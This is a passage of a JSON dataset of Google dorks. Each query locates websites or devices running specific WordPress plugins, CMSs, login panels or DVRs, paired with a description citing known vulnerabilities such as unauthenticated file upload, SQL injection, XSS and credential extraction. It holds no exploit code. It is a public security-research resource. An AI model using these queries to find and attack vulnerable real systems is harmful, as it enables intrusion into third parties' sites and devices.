"inurl:wp-content/plugins/form-maker", "description": "Google Dork: inurl:wp-content/plugins/form-maker \r\nThis google dork lists out Advisories and Vulnerabilities regarding the *Form\r\nmaker by 10Web *plugin.\r\nRef: https://wpvulndb.com/vulnerabilities/10237\r\nForm Maker by 10Web < 1.13.36 - Authenticated SQL Injection\r\n\r\nAuthor: Ritik Kumar Jain (Dasagreeva)\r\nLinkedIn: https://www.linkedin.com/in/ritik-kumar-jain-57675419b/"}, {"dork": "intitle:\"IceWarp WebClient\"", "description": "# Dork :intitle:\"IceWarp WebClient\"\r\n# IceWarp WebClient Login panel\r\n# Author : Ambadi MP"}, {"dork": "inurl:wp-content/plugins/coming-soon", "description": "Google Dork: inurl:wp-content/plugins/coming-soon\r\nThis google dork lists out Advisories and Vulnerabilities regarding\r\nthe coming soon page,maintenance and under construction pages.\r\nRef:https://wpvulndb.com/vulnerabilities/10283\r\nComing Soon Page, Under Construction & Maintenance Mode by SeedProd < 5.1.2\r\n- Authenticated Stored Cross Site Scripting (XSS)\r\n\r\n\r\nAuthor: Ritik Kumar Jain (Dasagreeva)\r\nLinkedIn: https://www.linkedin.com/in/ritik-kumar-jain-57675419b/"}, {"dork": "inurl:wp-content/themes/traveler", "description": "Google Dork: inurl:wp-content/themes/traveler\r\nThis google dork lists out Advisories and Vulnerabilities regarding the\r\nTravel Booking themes.\r\nRef:https://wpvulndb.com/vulnerabilities/10276\r\n*Travel Booking < 2.8.2 - Unauthenticated Reflected XSS*\r\nAuthor: Ritik Kumar Jain (Dasagreeva)\r\nLinkedIn: https://www.linkedin.com/in/ritik-kumar-jain-57675419b/"}, {"dork": "inurl:wp-content/plugins/gift", "description": "Google Dork:inurl:wp-content/plugins/gift\r\nThis google dork lists out Advisories and Vulnerabilities regarding all\r\nplugins for the gift card and gift vouchers pages.\r\nRef:\r\n1.WordPress Plugin Gift Voucher 1.0.5 - (Authenticated) 'template_id' SQL\r\nInjection\r\n https://www.exploit-db.com/exploits/45255\r\n2.WooCommerce Smart Coupons < 4.6.5 - Unauthenticated Coupon Creation\r\n https://wpvulndb.com/vulnerabilities/10109\r\n3. Gift Certificate Creator"}, {"dork": "intext:piwik \"Sign in\"", "description": "# Dork: intext:piwik \"Sign in\"\r\n# PIWIK LOGIN PAGES\r\n# Author : Pierguido Iezzi"}, {"dork": "inurl:wp-content/themes/nexos", "description": "Dork: inurl:wp-content/themes/nexos\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the nexos wordpress theme. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10285\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/themes/careerfy", "description": "Dork: inurl:wp-content/themes/careerfy\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the careerfy wordpress theme. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10291\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/security-malware-firewall", "description": "Dork: inurl:wp-content/plugins/security-malware-firewall\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the security-malware-firewall wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10292\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/themes/careerup", "description": "Dork: inurl:wp-content/themes/careerup\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the careerup wordpress theme. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10289\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/testimonials-widget", "description": "Dork: inurl:wp-content/plugins/testimonials-widget\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the testimonials-widget wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10288\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/wp-jobsearch", "description": "Dork: inurl:wp-content/plugins/wp-jobsearch\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the wp-jobsearch wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10290\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/payment-form-for-paypal-pro", "description": "Dork: inurl:wp-content/plugins/payment-form-for-paypal-pro\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the payment-form-for-paypal-pro wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10287\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/wpforms-lite", "description": "Description: inurl:wp-content/plugins/wpforms-lite\r\n\r\nThis google dorks give us the advisories and vulnerabilities on wordpress\r\nplugins.\r\n\r\nRef: https://wpvulndb.com/vulnerabilities/10286"}, {"dork": "allintext:wp-content/plugins/acf-to-rest-api", "description": "Description: allintext:wp-content/plugins/acf-to-rest-api\r\nThis google dorks give us the advisories and vulnerabilities on wordpress\r\nplugins.\r\n\r\nRef: https://wpvulndb.com/vulnerabilities/10284\r\n\r\nLinkedin : https://www.linkedin.com/in/peaceonmind/\r\n\r\nThanks,\r\nTanmay Bhattacharjee"}, {"dork": "inurl:wp-content/themes/sparky", "description": "Dork: inurl:wp-content/themes/sparky\r\n\r\nDescription: This google dorks give us the advisories and vulnerabilities\r\non WordPress Themes.\r\nRef.: https://wpvulndb.com/vulnerabilities/7338\r\nAuthor: Abhinav Porwal"}, {"dork": "inurl:wp-content/plugins/wp-live-chat-support", "description": "Dork: inurl:wp-content/plugins/wp-live-chat-support\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the wp-live-chat-support wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10303\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/form-maker", "description": "Dork: inurl:wp-content/plugins/form-maker\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the form-maker wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10305\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/newsletter", "description": "Dork: inurl:wp-content/plugins/newsletter\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the newsletter wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10304\r\nAuthor: Abhi Chitkara"}, {"dork": "allintext: wp-content/themes/injob", "description": "Description: allintext: wp-content/themes/injob\r\nThis google dorks give us the advisories and vulnerabilities on wordpress\r\nplugins.\r\n\r\nRef: https://wpvulndb.com/vulnerabilities/10302\r\n\r\nThanks,\r\nTanmay Bhattacharjee"}, {"dork": "inurl:wp-content/plugins/knight-lab-timelinejs", "description": "Description: inurl:wp-content/plugins/knight-lab-timelinejs\r\n\r\nThis google dorks give us the advisories and vulnerabilities on wordpress\r\nplugins.\r\n\r\nRef: https://wpvulndb.com/vulnerabilities/10298\r\n\r\nThanks,\r\nTanmay Bhattacharjee"}, {"dork": "inurl:wp-content/plugins/wise-chat", "description": "Description: inurl:wp-content/plugins/wise-chat\r\n\r\nThis google dorks give us the advisories and vulnerabilities on wordpress\r\nplugins.\r\n\r\nRef: https://wpvulndb.com/vulnerabilities/10299\r\n\r\nThanks,\r\nTanmay Bhattacharjee"}, {"dork": "inurl:wp-content/plugins/kingcomposer", "description": "Dork: inurl:wp-content/plugins/kingcomposer\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the kingcomposer wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/9265\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/knight-lab-timelinejs", "description": "Dork: inurl:wp-content/plugins/knight-lab-timelinejs\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the knight-lab-timelinejs wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10298\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/gravityforms", "description": "Dork: inurl:wp-content/plugins/gravityforms\r\n\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the gravity forms wordpress plugin.\r\n\r\nRef: https://wpvulndb.com/vulnerabilities/10252\r\n\r\nAuthor: Lokesh S"}, {"dork": "allintext:wp-content/plugins/angwp", "description": "Description:allintext:wp-content/plugins/angwp\r\nThis google dorks give us the advisories and vulnerabilities on wordpress\r\nplugins.\r\n\r\nRef: https://wpvulndb.com/vulnerabilities/10293\r\n\r\nThanks,\r\nTanmay Bhattacharjee"}, {"dork": "inurl:wp-content/plugins/angwp", "description": "Description: inurl:wp-content/plugins/angwp\r\nThis google dorks give us the advisories and vulnerabilities on wordpress\r\nplugins.\r\n\r\nRef: https://wpvulndb.com/vulnerabilities/10293\r\n\r\n\r\nThanks,\r\nTanmay Bhattacharjee"}, {"dork": "inurl:wp-content/themes/corona", "description": "Dork: inurl:wp-content/themes/corona\r\n\r\nDescription: This google dorks give us the advisories and vulnerabilities\r\non WordPress Themes.\r\n\r\nRef.: https://wpvulndb.com/vulnerabilities/7345\r\n\r\nAuthor: Abhinav Porwal"}, {"dork": "inurl:/wp-content/themes/realestate-7", "description": "Dork : inurl:/wp-content/themes/realestate-7\r\n\r\nDescription : This google dork lists out Advisories and Vulnerabilities\r\nregarding the realestate-7 wordpress theme.\r\n\r\nRef: https://wpvulndb.com/vulnerabilities/10024 ,\r\nhttps://wpvulndb.com/vulnerabilities/9492\r\n\r\nReal Estate 7 < 2.9.5 - Multiple Vulnerabilities\r\nReal Estate 7"}, {"dork": "inurl:/wp-content/plugins/angwp", "description": "Google Dork: inurl:/wp-content/plugins/angwp\r\nThis google dork lists out Advisories and Vulnerabilities regarding Adning\r\nAdvertising plugin.\r\nRef: https://wpvulndb.com/vulnerabilities/10293\r\nAdning Advertising < 1.5.6 - Unauthenticated Arbitrary File Upload/Deletion\r\nAuthor: Ritik Kumar Jain (Dasagreeva)\r\nLinkedIn: https://www.linkedin.com/in/ritik-kumar-jain-57675419b/\r\nTwitter: https://twitter.com/Dasagreeva1"}, {"dork": "inurl:wp-content/plugins/angwp", "description": "Dork: inurl:wp-content/plugins/angwp\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the angwp wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10293\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/wd-google-maps", "description": "DORK: inurl:wp-content/plugins/wd-google-maps\r\n\r\nhttps://wpvulndb.com/vulnerabilities/10099\r\n\r\nThis google dork gives us the advisories and vulnerabilities on wordpress\r\nplugins\r\n\r\nThanks,\r\nSachin"}, {"dork": "inurl:wp-content/plugins/sendpress", "description": "Dork: inurl:wp-content/plugins/sendpress\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the sendpress wordpress plugin. Ref:\r\nhttps://wpvulndb.com/vulnerabilities/10317\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:wp-content/plugins/wpjobboard", "description": "DORK: inurl:wp-content/plugins/wpjobboard\r\n\r\nhttps://wpvulndb.com/vulnerabilities/10113\r\n\r\nThis google dork gives us the advisories and vulnerabilities on wordpress\r\nplugins\r\n\r\nThanks,\r\nSachin"}, {"dork": "inurl:wp-content/plugins/idx-broker-platinum", "description": "DORK: inurl:wp-content/plugins/idx-broker-platinum\r\n\r\nhttps://wpvulndb.com/vulnerabilities/10153\r\n\r\nThis google dork gives us the advisories and vulnerabilities on wordpress\r\nplugins\r\n\r\n\r\nThanks,\r\nSachin"}, {"dork": "inurl:wp-content/plugins/async-javascript", "description": "DORK: inurl:wp-content/plugins/async-javascript\r\n\r\nhttps://wpvulndb.com/vulnerabilities/10098\r\n\r\nThis google dork gives us the advisories and vulnerabilities on wordpress\r\nplugins\r\n\r\n\r\nThanks,\r\nSachin"}, {"dork": "inurl:wp-content/plugins/all-in-one-wp-migration", "description": "DORK: inurl:wp-content/plugins/all-in-one-wp-migration\r\n\r\nhttps://wpvulndb.com/vulnerabilities/10151\r\n\r\nThis google dork gives us the advisories and vulnerabilities on wordpress\r\nplugins\r\n\r\n\r\nThanks,\r\nSachin"}, {"dork": "inurl:wp-content/plugins/lifterlms", "description": "DORK: inurl:wp-content/plugins/lifterlms\r\n\r\nhttps://wpvulndb.com/vulnerabilities/10159\r\n\r\nThis google dork gives us the advisories and vulnerabilities on wordpress\r\nplugins\r\n\r\nThanks,\r\nSachin"}, {"dork": "inurl:wp-content/plugins/arforms", "description": "DORK: inurl:wp-content/plugins/arforms\r\n\r\nhttps://wpvulndb.com/vulnerabilities/\r\n9139\r\n\r\n\r\nThis google dork gives us the advisories and vulnerabilities on wordpress\r\nplugins\r\n\r\nThanks,\r\nSachin"}, {"dork": "inurl:wp-content/plugins/safe-svg", "description": "DORK: inurl:wp-content/plugins/safe-svg\r\n\r\nhttps://wpvulndb.com/vulnerabilities/\r\n9942\r\n\r\n\r\nThis google dork gives us the advisories and vulnerabilities on wordpress\r\nplugins\r\n\r\n\r\nThanks,\r\nSachin"}, {"dork": "inurl:wp-content/plugins/sfwd-lms", "description": "DORK: inurl:wp-content/plugins/sfwd-lms\r\n\r\nhttps://wpvulndb.com/vulnerabilities/\r\n10461\r\n\r\nThis google dork gives us the advisories and vulnerabilities on wordpress\r\nplugins\r\n\r\n\r\nThanks,\r\nSachin"}, {"dork": "inurl:wp-content/plugins/iwp-client", "description": "DORK: inurl:wp-content/plugins/iwp-client\r\n\r\nhttps://wpvulndb.com/vulnerabilities/\r\n10011\r\n\r\n\r\nThis google dork gives us the advisories and vulnerabilities on wordpress\r\nplugins\r\n\r\nThanks,\r\nSachin"}, {"dork": "inurl:wp-content/plugins/email-subscribers", "description": "DORK:inurl:wp-content/plugins/email-subscribers\r\n\r\nhttps://wpvulndb.com/vulnerabilities/\r\n10322\r\n\r\nThis google dork gives us the advisories and vulnerabilities on wordpress\r\nplugins"}, {"dork": "intitle:ePMP 1000 intext:Log In -site:*.com -site:com.*", "description": "Hello!\r\nI have found a google dork to find ePMP 1000 devices. ePMP 1000 is\r\nvulnerable to command execution and changing of administrator credentials\r\nYou can find a lot of vulnerable hosts with this google dork.\r\n\r\nHave a nice day!"}, {"dork": "inurl:wp-content/plugins/redirection", "description": "Dork: inurl:wp-content/plugins/redirection\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the redirection wordpress plugin.\r\nRef: https://wpvulndb.com/vulnerabilities/9844\r\nAuthor: Lokesh S"}, {"dork": "inurl:wp-content/plugins/updraftplus", "description": "Dork: inurl:wp-content/plugins/updraftplus\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the updraftplus wordpress plugin.\r\nRef: https://wpvulndb.com/vulnerabilities/9843\r\nAuthor: Lokesh S"}, {"dork": "inurl:wp-content/plugins/my-calendar", "description": "Dork: inurl:wp-content/plugins/my-calendar\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the my calendar wordpress plugin.\r\nRef: https://wpvulndb.com/vulnerabilities/9267\r\nAuthor: Lokesh S"}, {"dork": "Index of : wp-content/plugins/wpmudev-updates/", "description": "Google Dork : Index of : wp-content/plugins/wpmudev-updates/\r\n\r\nDescription: This dork will lead to getting the keys and much more\r\nsensitive information of the directory.\r\n(Sensitive Data Exposure).\r\n\r\nAuthor : Pratik Khalane\r\n\r\nDate: 23-07-2020"}, {"dork": "inurl:\"/vam/index_vam_op.php\"", "description": "# Google Dork: inurl:\"/vam/index_vam_op.php\"\r\n\r\n# Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting. This\r\ndork is linked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/48715\r\n\r\n# Date: 27/07/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:wp-content/plugins/easy-media-gallery-pro", "description": "Dork: inurl:wp-content/plugins/easy-media-gallery-pro\r\nDescription: This google dork lists out Advisories and Vulnerabilities\r\nregarding the easy media gallery pro wordpress plugin.\r\nRef: https://wpvulndb.com/vulnerabilities/7545\r\nAuthor: Lokesh S"}, {"dork": "inurl:wp-content/plugins/wpdiscuz", "description": "Dork: inurl:wp-content/plugins/wpdiscuz\r\nDescription: This google dork lists out Advisories and Vulnerabilities regarding the wpdiscuz wordpress plugin.\r\nRef: \u200f\u2068https://wpvulndb.com/vulnerabilities/10333\u2069 \u200f\r\nAuthor: Gal Nagli"}, {"dork": "inurl:''com_gmapfp''", "description": "# Google Dork: inurl:''com_gmapfp''\r\n\r\n# Joomla! Component GMapFP 3.30 - Arbitrary File Upload. This dork is\r\nlinked to the following existing exploit:\r\nhttps://www.exploit-db.com/exploits/48248\r\n\r\n# Date: 31/07/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl: login.rsp", "description": "# Google Dork: inurl: login.rsp\r\n# Date: 27/08/2020\r\n# Exploit Author: Shreyas Gujar\r\n# CVE : CVE-2018-9995\r\n\r\n# Description: The CVE-2018-9995 vulnerability against IoT devices. It is\r\nable to extract account credentials of DVR devices thereby accessing the\r\ndevices and their video feeds.\r\n\r\nThanks and best regards\r\nShreyas Gujar\r\n\r\nhttps://twitter.com/shreyasrx?s=09"}, {"dork": "inurl:\"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\" - Wordpress File Manager", "description": "dork: inurl:\"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\"\r\nAuthor: bt0\r\nreferences:\r\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213\r\nhttps://wpvulndb.com/vulnerabilities/10389\r\n\r\nDescription:\r\n\r\nSeravo noticed multiple cases where WordPress sites were breached using 0-day in wp-file-manager (confirmed with v6.8, which was the latest version available in wordpress.org).\r\nFile lib/php/connector.minimal.php can be by default opened directly, and this file loads lib/php/elFinderConnector.class.php which reads POST/GET variables, and then allows executing some internal features, like uploading files. PHP is allowed, thus this leads to unauthenticated arbitrary file upload and remote code execution.\r\nIt seems that this vulnerability was originally discovered and published publicly on Twitter on August 26th (see references), and was later seen being exploited in the wild by Seravo.\r\n\r\nBest regards,\r\nbt0"}, {"dork": "inurl:device ext:rsp", "description": "Google Dork: inurl:device ext:rsp\r\n\r\nCVE: CVE-2018-9995 \r\n\r\nDescription: The CVE-2018-9995 vulnerability against IoT\r\ndevices. It is able to extract account credentials of DVR, MVR, MDVR, XVR,\r\nNVR etc devices thereby accessing the devices and their video feeds.\r\n\r\nAuthor : Sibi Mathew George"}, {"dork": "inurl:\"images/lists?cid=13\"", "description": "# Google Dork: inurl:\"images/lists?cid=13\"\r\n\r\n# MSVOD 10 - 'cid' SQL Injection. CVE : CVE-2018-14418.\r\nhttps://www.exploit-db.com/exploits/45062\r\n\r\n# Date: 17/09/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:\"Powered by Piwigo\"", "description": "# Google Dork: intext:\"Powered by Piwigo\"\r\n\r\n# CVE-2020-9467. Piwigo 2.10.1 - Cross Site Scripting.\r\nhttps://www.exploit-db.com/exploits/48814\r\n\r\n# Date: 2/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:\"Powered by Typesetter\"", "description": "# Google Dork: intext:\"Powered by Typesetter\"\r\n\r\n# Typesetter CMS 5.1 - 'Site Title' Persistent Cross-Site Scripting.\r\nhttps://www.exploit-db.com/exploits/48852\r\n\r\n# Date: 2/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:\"Published with Textpattern CMS\"", "description": "# Google Dork: intext:\"Published with Textpattern CMS\"\r\n\r\n# Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting.\r\nhttps://www.exploit-db.com/exploits/48861\r\n\r\n# Date: 9/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/wp-content/plugins/wp-file-manager/readme.txt", "description": "Dork to find CVE-2020\u201325213\r\n\r\n\" inurl:/wp-content/plugins/wp-file-manager/readme.txt \"\r\n\r\nBest Regards,\r\nKathan"}, {"dork": "intitle:\"Sphider Admin Login\"", "description": "# Google Dork: intitle:\"Sphider Admin Login\"\r\n\r\n# Sphider Search Engine 1.3.6 - Multiple Vulnerabilities.\r\n https://www.exploit-db.com/exploits/48957\r\n https://www.exploit-db.com/exploits/34189\r\n\r\n# Date: 27/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "Server: Mida eFramework", "description": "# Google Dork: Server: Mida eFramework\r\n\r\n# Mida eFramework 2.9.0 - Back Door Access.\r\nCVE : CVE-2020-15921. https://www.exploit-db.com/exploits/48823\r\nMida eFramework 2.9.0 - Remote Code Execution.\r\nCVE : CVE-2020-15920. https://www.exploit-db.com/exploits/48768\r\nMida eFramework 2.8.9 - Remote Code Execution\r\nCVE : CVE-2020-15922. https://www.exploit-db.com/exploits/48835\r\n\r\n# Date: 29/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Powered by Pro Chat Rooms\"", "description": "# Google Dork: intitle:\"Powered by Pro Chat Rooms\"\r\n# Pro Chat Rooms v8.2.0 - Multiple Vulnerabilities. CVE-2014-5275, CVE-2014-5276. https://www.exploit-db.com/exploits/34275\r\n# Date: 29/10/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"woocommerce-exporter\"", "description": "# Google Dork: inurl:\"woocommerce-exporter\"\r\n# WooCommerce Store Exporter v1.7.5 Stored XSS. https://www.exploit-db.com/exploits/34424\r\n# Date: 29/10/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:opac_css", "description": "# Google Dork: inurl:opac_css\r\n# PMB 5.6 - 'chemin' Local File Disclosure.\r\n# https://www.exploit-db.com/exploits/49054\r\n# Date: 17/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Please Login\" \"Use FTM Push\"", "description": "# Google Dork: intitle:\"Please Login\" \"Use FTM Push\"\r\n# Fortinet FortiOS 6.0.4 - Unauthenticated SSL VPN User Password Modification. CVE-2018-13382. https://www.exploit-db.com/exploits/49074\r\n# Date: 22/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"Powered by vBulletin(R) Version 5.6.3\"", "description": "# Google Dork: \"Powered by vBulletin\u00ae Version 5.6.3\"\r\n\r\n# vBulletin 5.6.3 - 'group' Cross Site Scripting.\r\nhttps://www.exploit-db.com/exploits/49209\r\n\r\n# Date: 7/12/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/wp-content/themes/altair/", "description": "# Google Dork : inurl:/wp-content/themes/altair/\r\n# Shows Altair WordPress theme v4.8 - Unauthenticated Reflected XSS\r\n# Author : ANURAG K P"}, {"dork": "inurl:/pro_users/login", "description": "# Google Dork: inurl:/pro_users/login\r\n# Spiceworks 7.5 - HTTP Header Injection. CVE : CVE-2020-25901.\r\n# https://www.exploit-db.com/exploits/49299\r\n# Date: 21/12/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/cgi-bin/manlist?section", "description": "# Google Dork: inurl:/cgi-bin/manlist?section\r\n# SCO Openserver 5.0.7 - 'section' Reflected XSS. CVE : CVE-2020-25495.\r\n# https://www.exploit-db.com/exploits/49300\r\n# SCO Openserver 5.0.7 - 'outputform' Command Injection. CVE : CVE-2020-25494\r\n# https://www.exploit-db.com/exploits/49301\r\n# Date: 21/12/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:\"Incom CMS 2.0\"", "description": "# Google Dork: intext:\"Incom CMS 2.0\"\r\n# IncomCMS 2.0 - Insecure File Upload. CVE: CVE-2020-29597. https://www.exploit-db.com/exploits/49351\r\n# Date: 5/1/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"machform\" inurl:\"view.php\"", "description": "# Google Dork: \"machform\" inurl:\"view.php\"\r\n# MachForm < 4.2.3 - SQL Injection / Path Traversal / Upload\r\n# Bypass. CVE-2018-6409, CVE-2018-6410, CVE-2018-6411.\r\n# https://www.exploit-db.com/exploits/44804\r\n\r\n# Date: 21/1/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"/console/login/LoginForm.jsp\"", "description": "# Google Dork: inurl:\"/console/login/LoginForm.jsp\"\r\n\r\n# Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated). CVE-2020 14882.\r\n# https://www.exploit-db.com/exploits/49479\r\n\r\n# Date: 28/1/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:uno.php", "description": "# Google Dork: inurl:uno.php\r\n\r\n# CMSUno 1.6.2 - 'lang/user' Remote Code Execution (Authenticated). \r\n#CVE :CVE-2020-25557 & CVE-2020-25538. https://www.exploit-db.com/exploits/49485\r\n\r\n# Date: 3/2/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"/wp-content/plugins/super-forms/\"", "description": "# Google Dork: inurl:\"/wp-content/plugins/super-forms/\"\r\n# WordPress Plugin SuperForms 4.9 - Arbitrary File Upload to Remote Code\r\n# Execution. https://www.exploit-db.com/exploits/49490\r\n\r\n# Date: 3/2/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"Powered By Best Support System\"", "description": "# Google Dork: \"Powered By Best Support System\"\r\n\r\n# Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated).\r\n# CVE: CVE-2020-24963. https://www.exploit-db.com/exploits/49122\r\n\r\n# Date: 23/2/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/calendar/calendar_form.php", "description": "# Google Dork: inurl:/calendar/calendar_form.php\r\n\r\n# Triconsole 3.75 - Reflected XSS. CVE: 2021-27330.\r\n# https://www.exploit-db.com/exploits/49597\r\n\r\n# Date: 1/3/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:/ics?tool=search", "description": "# Dork: inurl:/ics?tool=search\r\n# Dork To Find the WebApps Vulnerable for CVE-2021-26723"}, {"dork": "inurl:\"telerik.web.ui.webresource.axd?type=rau\"", "description": "Dork: inurl:\"telerik.web.ui.webresource.axd?type=rau\"\r\n\r\nReferences;\r\nhttps://github.com/noperator/CVE-2019-18935\r\nhttps://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui\r\n\r\nAuthor: Eray \u00c7ak\u0131n"}, {"dork": "inurl:\"/lib/editor/atto/plugins/managefiles/\" | inurl:\"calendar/view.php?view=month\"", "description": "# Google Dork: inurl:\"/lib/editor/atto/plugins/managefiles/\" | inurl:\"calendar/view.php?view=month\"\r\n\r\n# Moodle 3.10.3 - 'label' Persistent Cross Site Scripting.\r\n# https://www.exploit-db.com/exploits/49714\r\n\r\n# Date: 26/3/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"citsmart.local\"", "description": "# Google Dork: \"citsmart.local\"\r\n# CITSmart ITSM 9.1.2.22 - LDAP Injection. CVE : CVE-2020-35775. https://www.exploit-db.com/exploits/49762\r\n# CITSmart ITSM 9.1.2.27 - 'query' Time-based Blind SQL Injection (Authenticated).\r\n# CVE : CVE-2021-28142. https://www.exploit-db.com/exploits/49763\r\n# Date: 16/4/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"wp-content/plugins/wp-super-edit/superedit/\" | inurl:\"wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/\"", "description": "# Google Dork: inurl:\"wp-content/plugins/wp-super-edit/superedit/\" | inurl:\"wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/\"\r\n# Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload.\r\n# https://www.exploit-db.com/exploits/49839\r\n# Date: 25/05/2021\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:wp-content/plugins/1-flash-gallery", "description": "# Dork: inurl:wp-content/plugins/1-flash-gallery\r\n# Description:This google dork lists out Advisories and Vulnerabilities\r\n# regarding the 1-flash-gallery wordpress plugin.\r\n\r\n# Ref: https://wpscan.com/vulnerability/36e3817f-7fcc-4a97-9ea2-e5e3b01f93a1\r\n\r\n# Author: Rutvik Jaini"}, {"dork": "inurl:\"/wp-content/plugins/123ContactForm", "description": "# Dork: inurl:\"/wp-content/plugins/123ContactForm\"\r\n\r\n#Author: Rutvik Jaini\r\n\r\n#references: https://wpscan.com/vulnerability/ce716e4f-60f8-42e3-8891-a38e7948b970\r\n\r\nhttps://blog.sucuri.net/2021/01/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html\r\n\r\nDescriptionThe cfp-connect AJAX call uses user input controlled data to\r\nperform the signature verification, attackers could craft these values\r\n($message, $signature, $cf_pub_key) to bypass the validation mechanisms and\r\ninject their own public_key into the database.\r\n\r\nPOC:"}, {"dork": "inurl:wp-content/plugins/Ultimate-member", "description": "# Dork: inurl:wp-content/plugins/Ultimate-member\r\n# Description:This google dork lists out website using this vulnerable wordpress plugin even provide path to it unistall or install php link\r\n\r\n# exploit Ref:https://www.exploit-db.com/exploits/48065\r\nThanks and regards\r\n Mayank Bharti (cleverfox)"}, {"dork": "inurl:/wp-content/plugins/wpdiscuz/", "description": "# Google Dork: inurl:/wp-content/plugins/wpdiscuz/\r\n\r\n# Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload\r\n# (Unauthenticated). CVE : CVE-2020-24186.\r\n# https://www.exploit-db.com/exploits/49962\r\n\r\n# Date: 7/6/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:quicklinks.aspx", "description": "# Google Dorks : inurl:quicklinks.aspx\r\n# Advisories and Vulnerabilities\r\n# Date: 07/23/2021\r\n#Author: Abishekraghav Murugeashan"}, {"dork": "\"PHP Projectworlds 